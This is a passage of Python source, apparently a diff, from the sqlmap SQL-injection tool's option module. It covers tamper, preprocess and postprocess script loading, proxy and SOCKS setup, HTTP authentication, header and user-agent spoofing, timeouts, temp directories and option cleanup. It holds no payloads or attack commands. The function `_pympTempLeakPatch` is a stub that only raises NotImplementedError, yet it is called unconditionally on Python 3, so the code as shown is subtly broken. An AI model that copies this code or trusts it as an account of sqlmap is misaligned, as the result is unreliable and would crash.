getSafeExString(ex))) + + priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__ + + for name, function in inspect.getmembers(module, inspect.isfunction): + if name == "tamper" and (hasattr(inspect, "signature") and all(_ in inspect.signature(function).parameters for _ in ("payload", "kwargs")) or inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs"): + found = True + kb.tamperFunctions.append(function) + function.__name__ = module.__name__ + + if check_priority and priority > last_priority: + message = "it appears that you might have mixed " + message += "the order of tamper scripts. " + message += "Do you want to auto resolve this? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'N': + resolve_priorities = False + elif choice == 'Q': + raise SqlmapUserQuitException + else: + resolve_priorities = True + + check_priority = False + + priorities.append((priority, function)) + last_priority = priority + + break + elif name == "dependencies": + try: + function() + except Exception as ex: + errMsg = "error occurred while checking dependencies " + errMsg += "for tamper module '%s' ('%s')" % (getUnicode(filename[:-3]), getSafeExString(ex)) + raise SqlmapGenericException(errMsg) + + if not found: + errMsg = "missing function 'tamper(payload, **kwargs)' " + errMsg += "in tamper script '%s'" % script + raise SqlmapGenericException(errMsg) + + if kb.tamperFunctions and len(kb.tamperFunctions) > 3: + warnMsg = "using too many tamper scripts is usually not " + warnMsg += "a good idea" + logger.warning(warnMsg) + + if resolve_priorities and priorities: + priorities.sort(key=functools.cmp_to_key(lambda a, b: cmp(a[0], b[0])), reverse=True) + kb.tamperFunctions = [] + + for _, function in priorities: + kb.tamperFunctions.append(function) + +def _setPreprocessFunctions(): + """ + Loads preprocess function(s) from given script(s) + """ + + if conf.preprocess: + for script in re.split(PARAMETER_SPLITTING_REGEX, conf.preprocess): + found = False + function = None + + script = safeFilepathEncode(script.strip()) + + try: + if not script: + continue + + if not os.path.exists(script): + errMsg = "preprocess script '%s' does not exist" % script + raise SqlmapFilePathException(errMsg) + + elif not script.endswith(".py"): + errMsg = "preprocess script '%s' should have an extension '.py'" % script + raise SqlmapSyntaxException(errMsg) + except UnicodeDecodeError: + errMsg = "invalid character provided in option '--preprocess'" + raise SqlmapSyntaxException(errMsg) + + dirname, filename = os.path.split(script) + dirname = os.path.abspath(dirname) + + infoMsg = "loading preprocess module '%s'" % filename[:-3] + logger.info(infoMsg) + + if not os.path.exists(os.path.join(dirname, "__init__.py")): + errMsg = "make sure that there is an empty file '__init__.py' " + errMsg += "inside of preprocess scripts directory '%s'" % dirname + raise SqlmapGenericException(errMsg) + + if dirname not in sys.path: + sys.path.insert(0, dirname) + + try: + module = __import__(safeFilepathEncode(filename[:-3])) + except Exception as ex: + raise SqlmapSyntaxException("cannot import preprocess module '%s' (%s)" % (getUnicode(filename[:-3]), getSafeExString(ex))) + + for name, function in inspect.getmembers(module, inspect.isfunction): + try: + if name == "preprocess" and inspect.getargspec(function).args and all(_ in inspect.getargspec(function).args for _ in ("req",)): + found = True + + kb.preprocessFunctions.append(function) + function.__name__ = module.__name__ + + break + except ValueError: # Note: https://github.com/sqlmapproject/sqlmap/issues/4357 + pass + + if not found: + errMsg = "missing function 'preprocess(req)' " + errMsg += "in preprocess script '%s'" % script + raise SqlmapGenericException(errMsg) + else: + try: + function(_urllib.request.Request("http://localhost")) + except Exception as ex: + tbMsg = traceback.format_exc() + + if conf.debug: + dataToStdout(tbMsg) + + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.PREPROCESS, suffix=".py") + os.close(handle) + + openFile(filename, "w+b").write("#!/usr/bin/env\n\ndef preprocess(req):\n pass\n") + openFile(os.path.join(os.path.dirname(filename), "__init__.py"), "w+b").write("pass") + + errMsg = "function 'preprocess(req)' " + errMsg += "in preprocess script '%s' " % script + errMsg += "had issues in a test run ('%s'). " % getSafeExString(ex) + errMsg += "You can find a template script at '%s'" % filename + raise SqlmapGenericException(errMsg) + +def _setPostprocessFunctions(): + """ + Loads postprocess function(s) from given script(s) + """ + + if conf.postprocess: + for script in re.split(PARAMETER_SPLITTING_REGEX, conf.postprocess): + found = False + function = None + + script = safeFilepathEncode(script.strip()) + + try: + if not script: + continue + + if not os.path.exists(script): + errMsg = "postprocess script '%s' does not exist" % script + raise SqlmapFilePathException(errMsg) + + elif not script.endswith(".py"): + errMsg = "postprocess script '%s' should have an extension '.py'" % script + raise SqlmapSyntaxException(errMsg) + except UnicodeDecodeError: + errMsg = "invalid character provided in option '--postprocess'" + raise SqlmapSyntaxException(errMsg) + + dirname, filename = os.path.split(script) + dirname = os.path.abspath(dirname) + + infoMsg = "loading postprocess module '%s'" % filename[:-3] + logger.info(infoMsg) + + if not os.path.exists(os.path.join(dirname, "__init__.py")): + errMsg = "make sure that there is an empty file '__init__.py' " + errMsg += "inside of postprocess scripts directory '%s'" % dirname + raise SqlmapGenericException(errMsg) + + if dirname not in sys.path: + sys.path.insert(0, dirname) + + try: + module = __import__(safeFilepathEncode(filename[:-3])) + except Exception as ex: + raise SqlmapSyntaxException("cannot import postprocess module '%s' (%s)" % (getUnicode(filename[:-3]), getSafeExString(ex))) + + for name, function in inspect.getmembers(module, inspect.isfunction): + if name == "postprocess" and inspect.getargspec(function).args and all(_ in inspect.getargspec(function).args for _ in ("page", "headers", "code")): + found = True + + kb.postprocessFunctions.append(function) + function.__name__ = module.__name__ + + break + + if not found: + errMsg = "missing function 'postprocess(page, headers=None, code=None)' " + errMsg += "in postprocess script '%s'" % script + raise SqlmapGenericException(errMsg) + else: + try: + _, _, _ = function("", {}, None) + except: + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.PREPROCESS, suffix=".py") + os.close(handle) + + openFile(filename, "w+b").write("#!/usr/bin/env\n\ndef postprocess(page, headers=None, code=None):\n return page, headers, code\n") + openFile(os.path.join(os.path.dirname(filename), "__init__.py"), "w+b").write("pass") + + errMsg = "function 'postprocess(page, headers=None, code=None)' " + errMsg += "in postprocess script '%s' " % script + errMsg += "should return a tuple '(page, headers, code)' " + errMsg += "(Note: find template script at '%s')" % filename + raise SqlmapGenericException(errMsg) + +def _setThreads(): + if not isinstance(conf.threads, int) or conf.threads <= 0: + conf.threads = 1 + +def _setDNSCache(): + """ + Makes a cached version of socket._getaddrinfo to avoid subsequent DNS requests. + """ + + def _getaddrinfo(*args, **kwargs): + if args in kb.cache.addrinfo: + return kb.cache.addrinfo[args] + + else: + kb.cache.addrinfo[args] = socket._getaddrinfo(*args, **kwargs) + return kb.cache.addrinfo[args] + + if not hasattr(socket, "_getaddrinfo"): + socket._getaddrinfo = socket.getaddrinfo + socket.getaddrinfo = _getaddrinfo + +def _setSocketPreConnect(): + """ + Makes a pre-connect version of socket.create_connection + """ + + if conf.disablePrecon: + return + + def _thread(): + while kb.get("threadContinue") and not conf.get("disablePrecon"): + try: + for key in socket._ready: + if len(socket._ready[key]) < SOCKET_PRE_CONNECT_QUEUE_SIZE: + s = socket.create_connection(*key[0], **dict(key[1])) + with kb.locks.socket: + socket._ready[key].append((s, time.time())) + except KeyboardInterrupt: + break + except: + pass + finally: + time.sleep(0.01) + + def create_connection(*args, **kwargs): + retVal = None + + key = (tuple(args), frozenset(kwargs.items())) + with kb.locks.socket: + if key not in socket._ready: + socket._ready[key] = [] + + while len(socket._ready[key]) > 0: + candidate, created = socket._ready[key].pop(0) + if (time.time() - created) < PRECONNECT_CANDIDATE_TIMEOUT: + retVal = candidate + break + else: + try: + candidate.shutdown(socket.SHUT_RDWR) + candidate.close() + except socket.error: + pass + + if not retVal: + retVal = socket._create_connection(*args, **kwargs) + + return retVal + + if not hasattr(socket, "_create_connection"): + socket._ready = {} + socket._create_connection = socket.create_connection + socket.create_connection = create_connection + + thread = threading.Thread(target=_thread) + setDaemon(thread) + thread.start() + +def _setHTTPHandlers(): + """ + Check and set the HTTP/SOCKS proxy for all HTTP requests. + """ + + with kb.locks.handlers: + if conf.proxyList: + conf.proxy = conf.proxyList[0] + conf.proxyList = conf.proxyList[1:] + conf.proxyList[:1] + + if len(conf.proxyList) > 1: + infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy + logger.info(infoMsg) + + elif not conf.proxy: + if conf.hostname in ("localhost", "127.0.0.1") or conf.ignoreProxy: + proxyHandler.proxies = {} + + if conf.proxy: + debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests" + logger.debug(debugMsg) + + try: + _ = _urllib.parse.urlsplit(conf.proxy) + except Exception as ex: + errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + hostnamePort = _.netloc.rsplit(":", 1) + + scheme = _.scheme.upper() + hostname = hostnamePort[0] + port = None + username = None + password = None + + if len(hostnamePort) == 2: + try: + port = int(hostnamePort[1]) + except: + pass # drops into the next check block + + if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)): + errMsg = "proxy value must be in format '(%s)://address:port'" % "|".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE)) + raise SqlmapSyntaxException(errMsg) + + if conf.proxyCred: + _ = re.search(r"\A(.*?):(.*?)\Z", conf.proxyCred) + if not _: + errMsg = "proxy authentication credentials " + errMsg += "value must be in format username:password" + raise SqlmapSyntaxException(errMsg) + else: + username = _.group(1) + password = _.group(2) + + if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5): + proxyHandler.proxies = {} + + if scheme == PROXY_TYPE.SOCKS4: + warnMsg = "SOCKS4 does not support resolving (DNS) names (i.e. causing DNS leakage)" + singleTimeWarnMessage(warnMsg) + + socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if scheme == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, hostname, port, username=username, password=password) + socks.wrapmodule(_http_client) + else: + socks.unwrapmodule(_http_client) + + if conf.proxyCred: + # Reference: http://stackoverflow.com/questions/34079/how-to-specify-an-authenticated-proxy-for-a-python-http-connection + proxyString = "%s@" % conf.proxyCred + else: + proxyString = "" + + proxyString += "%s:%d" % (hostname, port) + proxyHandler.proxies = {"http": proxyString, "https": proxyString} + + proxyHandler.__init__(proxyHandler.proxies) + + if not proxyHandler.proxies: + for _ in ("http", "https"): + if hasattr(proxyHandler, "%s_open" % _): + delattr(proxyHandler, "%s_open" % _) + + debugMsg = "creating HTTP requests opener object" + logger.debug(debugMsg) + + handlers = filterNone([multipartPostHandler, proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, chunkedHandler if conf.chunked else None, httpsHandler]) + + if not conf.dropSetCookie: + if not conf.loadCookies: + conf.cj = _http_cookiejar.CookieJar() + else: + conf.cj = _http_cookiejar.MozillaCookieJar() + resetCookieJar(conf.cj) + + handlers.append(_urllib.request.HTTPCookieProcessor(conf.cj)) + + # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html + if conf.keepAlive: + warnMsg = "persistent HTTP(s) connections, Keep-Alive, has " + warnMsg += "been disabled because of its incompatibility " + + if conf.proxy: + warnMsg += "with HTTP(s) proxy" + logger.warning(warnMsg) + elif conf.authType: + warnMsg += "with authentication methods" + logger.warning(warnMsg) + else: + handlers.append(keepAliveHandler) + + opener = _urllib.request.build_opener(*handlers) + opener.addheaders = [] # Note: clearing default "User-Agent: Python-urllib/X.Y" + _urllib.request.install_opener(opener) + +def _setSafeVisit(): + """ + Check and set the safe visit options. + """ + if not any((conf.safeUrl, conf.safeReqFile)): + return + + if conf.safeReqFile: + checkFile(conf.safeReqFile) + + raw = readCachedFileContent(conf.safeReqFile) + match = re.search(r"\A([A-Z]+) ([^ ]+) HTTP/[0-9.]+\Z", raw.split('\n')[0].strip()) + + if match: + kb.safeReq.method = match.group(1) + kb.safeReq.url = match.group(2) + kb.safeReq.headers = {} + + for line in raw.split('\n')[1:]: + line = line.strip() + if line and ':' in line: + key, value = line.split(':', 1) + value = value.strip() + kb.safeReq.headers[key] = value + if key.upper() == HTTP_HEADER.HOST.upper(): + if not value.startswith("http"): + scheme = "http" + if value.endswith(":443"): + scheme = "https" + value = "%s://%s" % (scheme, value) + kb.safeReq.url = _urllib.parse.urljoin(value, kb.safeReq.url) + else: + break + + post = None + + if '\r\n\r\n' in raw: + post = raw[raw.find('\r\n\r\n') + 4:] + elif '\n\n' in raw: + post = raw[raw.find('\n\n') + 2:] + + if post and post.strip(): + kb.safeReq.post = post + else: + kb.safeReq.post = None + else: + errMsg = "invalid format of a safe request file" + raise SqlmapSyntaxException(errMsg) + else: + if not re.search(r"(?i)\Ahttp[s]*://", conf.safeUrl): + if ":443/" in conf.safeUrl: + conf.safeUrl = "https://%s" % conf.safeUrl + else: + conf.safeUrl = "http://%s" % conf.safeUrl + + if (conf.safeFreq or 0) <= 0: + errMsg = "please provide a valid value (>0) for safe frequency ('--safe-freq') while using safe visit features" + raise SqlmapSyntaxException(errMsg) + +def _setPrefixSuffix(): + if conf.prefix is not None and conf.suffix is not None: + # Create a custom boundary object for user's supplied prefix + # and suffix + boundary = AttribDict() + + boundary.level = 1 + boundary.clause = [0] + boundary.where = [1, 2, 3] + boundary.prefix = conf.prefix + boundary.suffix = conf.suffix + + if " like" in boundary.suffix.lower(): + if "'" in boundary.suffix.lower(): + boundary.ptype = 3 + elif '"' in boundary.suffix.lower(): + boundary.ptype = 5 + elif "'" in boundary.suffix: + boundary.ptype = 2 + elif '"' in boundary.suffix: + boundary.ptype = 4 + else: + boundary.ptype = 1 + + # user who provides --prefix/--suffix does not want other boundaries + # to be tested for + conf.boundaries = [boundary] + +def _setAuthCred(): + """ + Adds authentication credentials (if any) for current target to the password manager + (used by connection handler) + """ + + if kb.passwordMgr and all(_ is not None for _ in (conf.scheme, conf.hostname, conf.port, conf.authUsername, conf.authPassword)): + kb.passwordMgr.add_password(None, "%s://%s:%d" % (conf.scheme, conf.hostname, conf.port), conf.authUsername, conf.authPassword) + +def _setHTTPAuthentication(): + """ + Check and set the HTTP(s) authentication method (Basic, Digest, Bearer, NTLM or PKI), + username and password for first three methods, or PEM private key file for + PKI authentication + """ + + global authHandler + + if not conf.authType and not conf.authCred and not conf.authFile: + return + + if conf.authFile and not conf.authType: + conf.authType = AUTH_TYPE.PKI + + elif conf.authType and not conf.authCred and not conf.authFile: + errMsg = "you specified the HTTP authentication type, but " + errMsg += "did not provide the credentials" + raise SqlmapSyntaxException(errMsg) + + elif not conf.authType and conf.authCred: + errMsg = "you specified the HTTP authentication credentials, " + errMsg += "but did not provide the type (e.g. --auth-type=\"basic\")" + raise SqlmapSyntaxException(errMsg) + + elif (conf.authType or "").lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.BEARER, AUTH_TYPE.NTLM, AUTH_TYPE.PKI): + errMsg = "HTTP authentication type value must be " + errMsg += "Basic, Digest, Bearer, NTLM or PKI" + raise SqlmapSyntaxException(errMsg) + + if not conf.authFile: + debugMsg = "setting the HTTP authentication type and credentials" + logger.debug(debugMsg) + + authType = conf.authType.lower() + + if authType in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST): + regExp = "^(.*?):(.*?)$" + errMsg = "HTTP %s authentication credentials " % authType + errMsg += "value must be in format 'username:password'" + elif authType == AUTH_TYPE.BEARER: + conf.httpHeaders.append((HTTP_HEADER.AUTHORIZATION, "Bearer %s" % conf.authCred.strip())) + return + elif authType == AUTH_TYPE.NTLM: + regExp = "^(.*\\\\.*):(.*?)$" + errMsg = "HTTP NTLM authentication credentials value must " + errMsg += "be in format 'DOMAIN\\username:password'" + elif authType == AUTH_TYPE.PKI: + errMsg = "HTTP PKI authentication require " + errMsg += "usage of option `--auth-file`" + raise SqlmapSyntaxException(errMsg) + + aCredRegExp = re.search(regExp, conf.authCred) + + if not aCredRegExp: + raise SqlmapSyntaxException(errMsg) + + conf.authUsername = aCredRegExp.group(1) + conf.authPassword = aCredRegExp.group(2) + + kb.passwordMgr = _urllib.request.HTTPPasswordMgrWithDefaultRealm() + + _setAuthCred() + + if authType == AUTH_TYPE.BASIC: + authHandler = SmartHTTPBasicAuthHandler(kb.passwordMgr) + + elif authType == AUTH_TYPE.DIGEST: + authHandler = _urllib.request.HTTPDigestAuthHandler(kb.passwordMgr) + + elif authType == AUTH_TYPE.NTLM: + try: + from ntlm import HTTPNtlmAuthHandler + except ImportError: + errMsg = "sqlmap requires Python NTLM third-party library " + errMsg += "in order to authenticate via NTLM. Download from " + errMsg += "'https://github.com/mullender/python-ntlm'" + raise SqlmapMissingDependence(errMsg) + + authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(kb.passwordMgr) + else: + debugMsg = "setting the HTTP(s) authentication PEM private key" + logger.debug(debugMsg) + + _ = safeExpandUser(conf.authFile) + checkFile(_) + authHandler = HTTPSPKIAuthHandler(_) + +def _setHTTPExtraHeaders(): + if conf.headers: + debugMsg = "setting extra HTTP headers" + logger.debug(debugMsg) + + conf.headers = conf.headers.split("\n") if "\n" in conf.headers else conf.headers.split("\\n") + + for headerValue in conf.headers: + if not headerValue.strip(): + continue + + if headerValue.count(':') >= 1: + header, value = (_.lstrip() for _ in headerValue.split(":", 1)) + + if header and value: + conf.httpHeaders.append((header, value)) + elif headerValue.startswith('@'): + checkFile(headerValue[1:]) + kb.headersFile = headerValue[1:] + else: + errMsg = "invalid header value: %s. Valid header format is 'name:value'" % repr(headerValue).lstrip('u') + raise SqlmapSyntaxException(errMsg) + + elif not conf.requestFile and len(conf.httpHeaders or []) < 2: + if conf.encoding: + conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.encoding)) + + # Invalidating any caching mechanism in between + # Reference: http://stackoverflow.com/a/1383359 + conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache")) + +def _setHTTPUserAgent(): + """ + Set the HTTP User-Agent header. + Depending on the user options it can be: + + * The default sqlmap string + * A default value read as user option + * A random value read from a list of User-Agent headers from a + file choosed as user option + """ + + debugMsg = "setting the HTTP User-Agent header" + logger.debug(debugMsg) + + if conf.mobile: + if conf.randomAgent: + _ = random.sample([_[1] for _ in getPublicTypeMembers(MOBILES, True)], 1)[0] + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, _)) + else: + message = "which smartphone do you want sqlmap to imitate " + message += "through HTTP User-Agent header?\n" + items = sorted(getPublicTypeMembers(MOBILES, True)) + + for count in xrange(len(items)): + item = items[count] + message += "[%d] %s%s\n" % (count + 1, item[0], " (default)" if item == MOBILES.IPHONE else "") + + test = readInput(message.rstrip('\n'), default=items.index(MOBILES.IPHONE) + 1) + + try: + item = items[int(test) - 1] + except: + item = MOBILES.IPHONE + + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, item[1])) + + elif conf.agent: + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, conf.agent)) + + elif not conf.randomAgent: + _ = True + + for header, _ in conf.httpHeaders: + if header.upper() == HTTP_HEADER.USER_AGENT.upper(): + _ = False + break + + if _: + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, DEFAULT_USER_AGENT)) + + else: + userAgent = fetchRandomAgent() + + infoMsg = "fetched random HTTP User-Agent header value '%s' from " % userAgent + infoMsg += "file '%s'" % paths.USER_AGENTS + logger.info(infoMsg) + + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, userAgent)) + +def _setHTTPReferer(): + """ + Set the HTTP Referer + """ + + if conf.referer: + debugMsg = "setting the HTTP Referer header" + logger.debug(debugMsg) + + conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.referer)) + +def _setHTTPHost(): + """ + Set the HTTP Host + """ + + if conf.host: + debugMsg = "setting the HTTP Host header" + logger.debug(debugMsg) + + conf.httpHeaders.append((HTTP_HEADER.HOST, conf.host)) + +def _setHTTPCookies(): + """ + Set the HTTP Cookie header + """ + + if conf.cookie: + debugMsg = "setting the HTTP Cookie header" + logger.debug(debugMsg) + + conf.httpHeaders.append((HTTP_HEADER.COOKIE, conf.cookie)) + +def _setHostname(): + """ + Set value conf.hostname + """ + + if conf.url: + try: + conf.hostname = _urllib.parse.urlsplit(conf.url).netloc.split(':')[0] + except ValueError as ex: + errMsg = "problem occurred while " + errMsg += "parsing an URL '%s' ('%s')" % (conf.url, getSafeExString(ex)) + raise SqlmapDataException(errMsg) + +def _setHTTPTimeout(): + """ + Set the HTTP timeout + """ + + if conf.timeout: + debugMsg = "setting the HTTP timeout" + logger.debug(debugMsg) + + conf.timeout = float(conf.timeout) + + if conf.timeout < 3.0: + warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap " + warnMsg += "will going to reset it" + logger.warning(warnMsg) + + conf.timeout = 3.0 + else: + conf.timeout = 30.0 + + try: + socket.setdefaulttimeout(conf.timeout) + except OverflowError as ex: + raise SqlmapValueException("invalid value used for option '--timeout' ('%s')" % getSafeExString(ex)) + +def _checkDependencies(): + """ + Checks for missing dependencies. + """ + + if conf.dependencies: + checkDependencies() + +def _createHomeDirectories(): + """ + Creates directories inside sqlmap's home directory + """ + + if conf.get("purge"): + return + + for context in ("output", "history"): + directory = paths["SQLMAP_%s_PATH" % getUnicode(context).upper()] # NOTE: https://github.com/sqlmapproject/sqlmap/issues/4363 + try: + if not os.path.isdir(directory): + os.makedirs(directory) + + _ = os.path.join(directory, randomStr()) + open(_, "w+b").close() + os.remove(_) + + if conf.get("outputDir") and context == "output": + warnMsg = "using '%s' as the %s directory" % (directory, context) + logger.warning(warnMsg) + except (OSError, IOError) as ex: + tempDir = tempfile.mkdtemp(prefix="sqlmap%s" % context) + warnMsg = "unable to %s %s directory " % ("create" if not os.path.isdir(directory) else "write to the", context) + warnMsg += "'%s' (%s). " % (directory, getUnicode(ex)) + warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) + logger.warning(warnMsg) + + paths["SQLMAP_%s_PATH" % context.upper()] = tempDir + +def _pympTempLeakPatch(tempDir): # Cross-referenced function + raise NotImplementedError + +def _createTemporaryDirectory(): + """ + Creates temporary directory for this run. + """ + + if conf.tmpDir: + try: + if not os.path.isdir(conf.tmpDir): + os.makedirs(conf.tmpDir) + + _ = os.path.join(conf.tmpDir, randomStr()) + + open(_, "w+b").close() + os.remove(_) + + tempfile.tempdir = conf.tmpDir + + warnMsg = "using '%s' as the temporary directory" % conf.tmpDir + logger.warning(warnMsg) + except (OSError, IOError) as ex: + errMsg = "there has been a problem while accessing " + errMsg += "temporary directory location(s) ('%s')" % getSafeExString(ex) + raise SqlmapSystemException(errMsg) + else: + try: + if not os.path.isdir(tempfile.gettempdir()): + os.makedirs(tempfile.gettempdir()) + except Exception as ex: + warnMsg = "there has been a problem while accessing " + warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex) + warnMsg += "make sure that there is enough disk space left. If problem persists, " + warnMsg += "try to set environment variable 'TEMP' to a location " + warnMsg += "writeable by the current user" + logger.warning(warnMsg) + + if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir: + try: + tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid())) + except: + tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid())) + + kb.tempDir = tempfile.tempdir + + if not os.path.isdir(tempfile.tempdir): + try: + os.makedirs(tempfile.tempdir) + except Exception as ex: + errMsg = "there has been a problem while setting " + errMsg += "temporary directory location ('%s')" % getSafeExString(ex) + raise SqlmapSystemException(errMsg) + + if six.PY3: + _pympTempLeakPatch(kb.tempDir) + +def _cleanupOptions(): + """ + Cleanup configuration attributes. + """ + + if conf.encoding: + try: + codecs.lookup(conf.encoding) + except LookupError: + errMsg = "unknown encoding '%s'" % conf.encoding + raise SqlmapValueException(errMsg) + + debugMsg = "cleaning up configuration parameters" + logger.debug(debugMsg) + + width = getConsoleWidth() + + if conf.eta: + conf.progressWidth = width - 26 + else: + conf.progressWidth = width - 46 + + for key, value in conf.items(): + if value and any(key.endswith(_) for _ in ("Path", "File", "Dir")): + if isinstance(value, str): + conf[key] = safeExpandUser(value) + + if conf.testParameter: + conf.testParameter = urldecode(conf.testParameter) + conf.testParameter = [_.strip() for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.testParameter)] + else: + conf.testParameter = [] + + if conf.ignoreCode: + if conf.ignoreCode == IGNORE_CODE_WILDCARD: + conf.ignoreCode = xrange(0, 1000) + else: + try: + conf.ignoreCode = [int(_) for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.ignoreCode)] + except ValueError: + errMsg = "option '--ignore-code' should contain a list of integer values or a wildcard value '%s'" % IGNORE_CODE_WILDCARD + raise SqlmapSyntaxException(errMsg) + else: + conf.ignoreCode = [] + + if conf.abortCode: + try: + conf.abortCode = [int(_) for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.abortCode)] + except ValueError: + errMsg = "option '--abort-code' should contain a list of integer values" + raise SqlmapSyntaxException(errMsg) + else: + conf.abortCode = [] + + if conf.paramFilter: + conf.paramFilter = [_.strip() for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.paramFilter.upper())] + else: + conf.paramFilter = [] + + if conf.base64Parameter: + conf.base64Parameter = urldecode(conf.base64Parameter) + conf.base64Parameter = conf.base64Parameter.strip() + conf.base64Parameter = re.split(PARAMETER_SPLITTING_REGEX, conf.base64Parameter) + else: + conf.base64Parameter = [] + + if conf.agent: + conf.agent = re.sub(r"[\r\n]", "", conf.agent) + + if conf.user: + conf.user = conf.user.replace(" ", "") + + if conf.rParam: + if all(_ in conf.rParam for _ in ('=', ',')): + original = conf.rParam + conf.rParam = [] + for part in original.split(';'): + if '=' in part: + left, right = part.split('=', 1) + conf.rParam.append(left) + kb.randomPool[left] = filterNone(_.strip() for _ in right.split(',')) + else: + conf.rParam.append(part) + else: + conf.rParam = conf.rParam.replace(" ", "") + conf.rParam = re.split(PARAMETER_SPLITTING_REGEX, conf.rParam) + else: + conf.rParam = [] + + if conf.paramDel: + conf.paramDel = decodeStringEscape(conf.paramDel) + + if conf.skip: + conf.skip = conf.skip.replace(" ", "") + conf.skip = re.split(PARAMETER_SPLITTING_REGEX, conf.skip) + else: + conf.skip = [] + + if conf.cookie: + conf.cookie = re.sub(r"[\r\n]", "", conf.cookie) + + if conf.delay: + conf.delay = float(conf.delay) + + if conf.url: + conf.url = conf.url.strip().lstrip('/') + if not re.search(r"\A\w+://", conf.url): + conf.url = "http://%s" % conf.url + + if conf.fileRead: + conf.fileRead = ntToPosixSlashes(normalizePath(conf.fileRead)) + + if conf.fileWrite: + conf.fileWrite = ntToPosixSlashes(normalizePath(conf.fileWrite)) + + if conf.fileDest: + conf.fileDest = ntToPosixSlashes(normalizePath(conf.fileDest)) + + if conf.msfPath: + conf.msfPath = ntToPosixSlashes(normalizePath(conf.msfPath)) + + if conf.tmpPath: + conf.tmpPath = ntToPosixSlashes(normalizePath(conf.tmpPath)) + + if any((conf.googleDork, conf.logFile, conf.bulkFile, conf.forms, conf.crawlDepth, conf.stdinPipe)): + conf.multipleTargets = True + + if conf.optimize: + setOptimize() + + if conf.os: + conf.os = conf.os.capitalize() + + if conf.forceDbms: + conf.dbms = conf.forceDbms + + if conf.dbms: + kb.dbmsFilter = [] + for _ in conf.dbms.split(','): + for dbms, aliases in DBMS_ALIASES: + if _.strip().lower() in aliases: + kb.dbmsFilter.append(dbms) + conf.dbms = dbms if conf.dbms and ',' not in conf.dbms else None + break + + if conf.uValues: + conf.uCols = "%d-%d" % (1 + conf.uValues.count(','), 1 + conf.uValues.count(',')) + + if conf.testFilter: + conf.testFilter = conf.testFilter.strip('*+') + conf.testFilter = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testFilter) + + try: + re.compile(conf.testFilter) + except re.error: + conf.testFilter = re.escape(conf.testFilter) + + if conf.csrfToken: + original = conf.csrfToken + try: + re.compile(conf.csrfToken) + + if re.escape(conf.csrfToken) != conf.csrfToken: + message = "provided value for option '--csrf-token' is a regular expression? [y/N] " + if not readInput(message, default='N', boolean=True): + conf.csrfToken = re.escape(conf.csrfToken) + except re.error: + conf.csrfToken = re.escape(conf.csrfToken) + finally: + class _(six.text_type): + pass + conf.csrfToken = _(conf.csrfToken) + conf.csrfToken._original = original + + if conf.testSkip: + conf.testSkip = conf.testSkip.strip('*+') + conf.testSkip = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testSkip) + + try: + re.compile(conf.testSkip) + except re.error: + conf.testSkip = re.escape(conf.testSkip) + + if "timeSec" not in kb.explicitSettings: + if conf.tor: + conf.timeSec = 2 * conf.timeSec + kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE + + warnMsg = "increasing default value for " + warnMsg += "option '--time-sec' to %d because " % conf.timeSec + warnMsg += "switch '--tor' was provided" + logger.warning(warnMsg) + else: + kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE + + if conf.retries: + conf.retries = min(conf.retries, MAX_CONNECT_RETRIES) + + if conf.url: + match = re.search(r"\A(\w+://)?([^/@?]+)@", conf.url) + if match: + credentials = match.group(2) + conf.url = conf.url.replace("%s@" % credentials, "", 1) + + conf.authType = AUTH_TYPE.BASIC + conf.authCred = credentials if ':' in credentials else "%s:" % credentials + + if conf.code: + conf.code = int(conf.code) + + if conf.csvDel: + conf.csvDel = decodeStringEscape(conf.csvDel) + + if conf.torPort and hasattr(conf.torPort, "isdigit") and conf.torPort.isdigit(): + conf.torPort = int(conf.torPort) + + if conf.torType: + conf.torType = conf.torType.upper() + + if conf.outputDir: + paths.SQLMAP_OUTPUT_PATH = os.path.realpath(os.path.expanduser(conf.outputDir)) + setPaths(paths.SQLMAP_ROOT_PATH) + + if conf.string: + conf.string = decodeStringEscape(conf.string) + + if conf.getAll: + for _ in WIZARD.ALL: + conf.__setitem__(_, True) + + if conf.noCast: + DUMP_REPLACEMENTS.clear() + + if 